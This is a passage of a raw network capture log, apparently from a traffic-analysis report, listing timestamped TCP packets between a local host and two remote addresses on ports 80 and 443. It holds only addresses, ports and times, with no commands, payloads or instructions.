                                                                                                                                                                        Nov 24, 2024 05:11:43.938826084 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:43.939538956 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:43.939647913 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:43.939769030 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:43.940382004 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:43.940494061 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:43.940535069 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:43.941256046 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:43.941368103 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:43.941483974 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:43.942123890 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:43.942162991 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:43.942217112 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:43.942965984 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:43.943063021 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:43.943165064 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:43.943829060 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:43.943931103 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:43.944677114 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:43.944756031 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:43.944786072 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:43.944849014 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:43.945538998 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:43.945664883 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:43.946388960 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:43.946430922 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:43.946458101 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:43.946497917 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:43.947261095 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:43.947360039 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:43.947403908 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:43.948122025 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:43.948229074 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:43.948273897 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:43.948968887 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:43.949122906 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:43.949178934 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:43.949853897 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:43.949944973 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:43.949980974 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:43.950716972 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:43.950831890 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:43.951562881 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:43.951617002 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:43.951669931 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:43.951706886 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:43.952447891 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:43.952512980 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:43.953262091 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:43.953315973 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:43.953378916 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:43.953418016 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:43.954128981 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:43.954255104 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:43.954808950 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:43.954941034 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.005182981 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:44.090630054 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:44.102070093 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.102092028 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.102139950 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:44.102386951 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.102443933 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.102518082 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:44.103243113 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.103363991 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.103452921 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:44.104115963 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.104254961 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.104373932 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:44.104952097 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.105062962 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.105161905 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:44.105808973 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.105988026 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.106038094 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:44.106676102 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.106777906 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.106882095 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:44.107517958 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.107628107 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.107677937 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:44.107949018 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:44.108382940 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.108478069 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.108524084 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:44.109249115 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.109349966 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.110066891 CET4434976713.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.110125065 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.110126972 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:44.110230923 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.110807896 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:44.110833883 CET49767443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:44.110865116 CET4434976713.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.110958099 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.111067057 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.111499071 CET49767443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:44.111504078 CET4434976713.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.111517906 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:44.111833096 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.111951113 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.111994028 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:44.112692118 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.112741947 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.112783909 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:44.113534927 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.113645077 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.113689899 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:44.114418983 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.114521027 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.114625931 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:44.115236998 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.115345955 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.115392923 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:44.116137028 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.116250992 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.116295099 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:44.116971016 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.117039919 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.117136955 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:44.117855072 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.117952108 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.117996931 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:44.118690014 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.118812084 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.118856907 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:44.119555950 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.119666100 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.119734049 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:44.120412111 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.120532990 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.120575905 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:44.121290922 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.121426105 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.121553898 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:44.122153997 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.122250080 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.122299910 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:44.123016119 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.123131990 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.123193026 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:44.123857021 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.123960972 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.124011040 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:44.124705076 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.124830961 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.124892950 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:44.125657082 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.125766993 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.125859976 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:44.126457930 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.126590967 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.126801968 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:44.127295017 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.127410889 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.128130913 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.128174067 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:44.128242970 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.128290892 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:44.129008055 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.129118919 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.129165888 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:44.129904985 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.130038977 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.130227089 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:44.130733967 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.130853891 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.131479025 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:44.131589890 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.131696939 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.131742001 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:44.132510900 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.132725954 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.132838964 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:44.133306980 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.133429050 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.133563042 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:44.134162903 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.134279966 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.134332895 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:44.135013103 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.135128975 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.135173082 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:44.135884047 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.136003017 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.136048079 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:44.136733055 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.136856079 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.136899948 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:44.137612104 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.137717962 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.137775898 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:44.138456106 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.138534069 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.138581038 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:44.139319897 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.139436960 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.139533997 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:44.140176058 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.140285969 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.140331030 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:44.141042948 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.141139984 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.141206980 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:44.141916990 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.142040014 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.142081976 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:44.142797947 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.142889977 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.143248081 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:44.143639088 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.143809080 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.143846035 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:44.144476891 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.144601107 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.144640923 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:44.145348072 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.145459890 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.145787001 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:44.146188021 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.146313906 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.146353006 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:44.146997929 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.182091951 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:44.183136940 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:44.241790056 CET4434976413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.241880894 CET4434976413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.242053032 CET49764443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:44.242392063 CET49764443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:44.242418051 CET4434976413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.242445946 CET49764443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:44.242451906 CET4434976413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.246378899 CET49768443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:44.246444941 CET4434976813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.246545076 CET49768443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:44.246726990 CET49768443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:44.246745110 CET4434976813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.294222116 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.294336081 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.294634104 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.294647932 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.294832945 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:44.295356989 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.295654058 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.295717955 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:44.296051025 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.296185017 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.296233892 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:44.296922922 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.297012091 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.297065020 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:44.297775984 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.297888994 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.297938108 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:44.298614979 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.298729897 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.298794031 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:44.299509048 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.299704075 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.300343037 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.300406933 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:44.300441027 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.301224947 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.301275969 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:44.301356077 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.302062988 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.302122116 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:44.302161932 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.302561998 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:44.302912951 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.303056002 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.303353071 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:44.303802967 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.303931952 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.303988934 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:44.304656982 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.304775000 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.304836035 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:44.305532932 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.305669069 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.305726051 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:44.306339025 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.306454897 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.306519985 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:44.306534052 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:44.307212114 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.307329893 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.307589054 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:44.308079958 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.308207035 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.308270931 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:44.308939934 CET8049761185.215.113.16192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:44.309041023 CET8049761185.215.113.16192.168.2.7
